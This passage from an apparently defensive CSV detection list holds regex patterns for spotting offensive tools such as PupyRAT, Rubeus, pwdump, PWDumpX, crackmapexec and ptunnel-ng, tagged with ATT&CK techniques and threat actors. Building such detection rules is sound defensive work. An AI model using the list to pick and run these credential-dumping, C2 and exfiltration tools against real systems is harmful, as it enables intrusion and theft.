stub","T1027 
- T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","2691" "* psexecsvc.py*",".{0,1000}\spsexecsvc\.py.{0,1000}","offensive_tool_keyword","susinternals","python implementation of PSExec native service implementation","T1569.002 - T1021.002 - T1035","TA0002 - TA0004 - TA0008 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/susinternals","1","0","N/A","N/A","7","2","194","18","2025-02-11T09:34:50Z","2025-02-10T07:40:36Z","2692" "* psgetsys.ps1*",".{0,1000}\spsgetsys\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","2693" "* psgetsys.ps1*",".{0,1000}\spsgetsys\.ps1.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embeded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","0","N/A","N/A","10","5","406","88","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z","2694" "* PSLessExec.exe*",".{0,1000}\sPSLessExec\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","2695" "* 
PSnmap.ps1*",".{0,1000}\sPSnmap\.ps1.{0,1000}","offensive_tool_keyword","Psnmap","Powershell scanner (nmap like)","T1086 - T1046 - T1059","TA0007","N/A","Black Basta","Discovery","https://github.com/KurtDeGreeff/PlayPowershell/blob/master/PSnmap.ps1","1","0","N/A","N/A","7","2","178","64","2024-08-23T18:24:20Z","2015-01-24T10:46:41Z","2696" "* PSObfucate.py*",".{0,1000}\sPSObfucate\.py.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","2697" "* ptt /ticket:*",".{0,1000}\sptt\s\/ticket\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","2698" "* ptunnel-ng*",".{0,1000}\sptunnel\-ng.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","2699" "* --publickey * --ecmdigits 25 --verbose --private*",".{0,1000}\s\-\-publickey\s.{0,1000}\s\-\-ecmdigits\s25\s\-\-verbose\s\-\-private.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2700" "* --publickey * --uncipherfile ./ciphered\_file*",".{0,1000}\s\-\-publickey\s.{0,1000}\s\-\-uncipherfile\s\.\/ciphered\\_file.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2701" "* 
puppet-naivesigning.nse*",".{0,1000}\spuppet\-naivesigning\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2705" "* PupyCredentials*",".{0,1000}\sPupyCredentials.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2706" "* pupylib.*",".{0,1000}\spupylib\..{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - 
T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2707" "* pupysh.py*",".{0,1000}\spupysh\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2708" "* pupysh.sh*",".{0,1000}\spupysh\.sh.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2709" "* 
PupySocketStream*",".{0,1000}\sPupySocketStream.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2710" "* PupyTCPClient*",".{0,1000}\sPupyTCPClient.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2711" "* PupyTCPServer*",".{0,1000}\sPupyTCPServer.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - 
T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2712" "* PupyWebServer*",".{0,1000}\sPupyWebServer.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2713" "* PupyWebSocketClient*",".{0,1000}\sPupyWebSocketClient.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - 
T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2714" "* PupyWebSocketServer*",".{0,1000}\sPupyWebSocketServer.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2715" "* pupyx64.dll*",".{0,1000}\spupyx64\.dll.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting 
Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2716" "* pupyx64.exe*",".{0,1000}\spupyx64\.exe.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2717" "* pupyx64.lin*",".{0,1000}\spupyx64\.lin.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2718" "* pupyx86.dll*",".{0,1000}\spupyx86\.dll.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in 
python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2719" "* pupyx86.exe*",".{0,1000}\spupyx86\.exe.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2720" "* push_payload*",".{0,1000}\spush_payload.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - 
T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2721" "* putterpanda.py*",".{0,1000}\sputterpanda\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","2722" "* pwcrack.sh*",".{0,1000}\spwcrack\.sh.{0,1000}","offensive_tool_keyword","nsa-rules","Password cracking rules and masks for hashcat that I generated from cracked passwords.","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/NSAKEY/nsa-rules","1","0","N/A","N/A","10","6","547","125","2017-01-03T11:53:25Z","2016-02-15T20:49:32Z","2723" "* pwcrack-framework*",".{0,1000}\spwcrack\-framework.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","2724" "* pwdump.py*",".{0,1000}\spwdump\.py.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential 
Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","2725" "* pwdump.py*",".{0,1000}\spwdump\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2726" "* -PWDumpFormat *",".{0,1000}\s\-PWDumpFormat\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 
- TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","2727" "* PWDumpX process *",".{0,1000}\sPWDumpX\sprocess\s.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#content","N/A","10","8","N/A","N/A","N/A","N/A","2728" "* PWDumpX service *",".{0,1000}\sPWDumpX\sservice\s.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. 
This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#content","N/A","10","8","N/A","N/A","N/A","N/A","2729" "* pwn_php.me*",".{0,1000}\spwn_php\.me.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","375","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z","2730" "* pwn_python.me*",".{0,1000}\spwn_python\.me.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","375","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z","2731" "* Pwn3d!*",".{0,1000}\sPwn3d!.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2733" "* pyasn1 *",".{0,1000}\spyasn1\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","2736" "* 